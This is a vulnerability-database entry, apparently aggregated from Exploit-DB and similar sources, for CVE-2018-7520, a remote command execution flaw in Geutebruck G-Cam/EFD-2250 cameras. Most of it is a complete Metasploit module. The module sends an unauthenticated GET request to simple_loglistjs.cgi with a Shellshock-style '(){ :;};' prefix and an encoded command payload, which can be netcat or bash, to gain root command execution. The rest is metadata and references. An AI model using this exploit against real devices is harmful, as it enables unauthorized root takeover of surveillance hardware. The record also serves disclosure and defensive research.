ID
VAR-E-201807-0141
CVE
cve_id: | CVE-2018-7520 | Trust: 0.5 |
EDB ID
44957
TITLE
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit).. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | geutebruck | model: | g-cam/efd-2250 | scope: | eq | version: | 5.02024 | Trust: 2.2 |
vendor: | geutebruck | model: | simple loglistjs.cgi remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.12.0.19 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
},
'Author' =>
[
'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-7520' ],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 20 2018'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
], self.class)
end
def exploit
header = "(){ :;}; "
encpayload = "#{header}#{payload.encoded}"
uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
print_status("#{rhost}:#{rport} - Attempting to exploit...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri
})
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
Trust: 1.6
TAGS
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | exploit | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
tag: | cgi | Trust: 0.5 |
tag: | root | Trust: 0.5 |
CREDITS
RandoriSec
Trust: 0.6
EXTERNAL IDS
db: | ICS CERT | id: | ICSA-18-079-01 | Trust: 2.7 |
db: | EXPLOIT-DB | id: | 44957 | Trust: 1.6 |
db: | EDBNET | id: | 98505 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 30660 | Trust: 0.6 |
db: | EDBNET | id: | 98500 | Trust: 0.6 |
db: | NVD | id: | CVE-2018-7520 | Trust: 0.5 |
db: | PACKETSTORM | id: | 148380 | Trust: 0.5 |
REFERENCES
url: | https://www.exploit-db.com/exploits/44957/ | Trust: 0.6 |
url: | https://0day.today/exploits/30660 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-7520 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 148380 |
db: | EXPLOIT-DB | id: | 44957 |
db: | EDBNET | id: | 98505 |
db: | EDBNET | id: | 98500 |
LAST UPDATE DATE
2022-07-27T09:49:15.722000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 148380 | date: | 2018-07-02T16:16:13 |
db: | EXPLOIT-DB | id: | 44957 | date: | 2018-07-02T00:00:00 |
db: | EDBNET | id: | 98505 | date: | 2018-07-03T00:00:00 |
db: | EDBNET | id: | 98500 | date: | 2018-07-03T00:00:00 |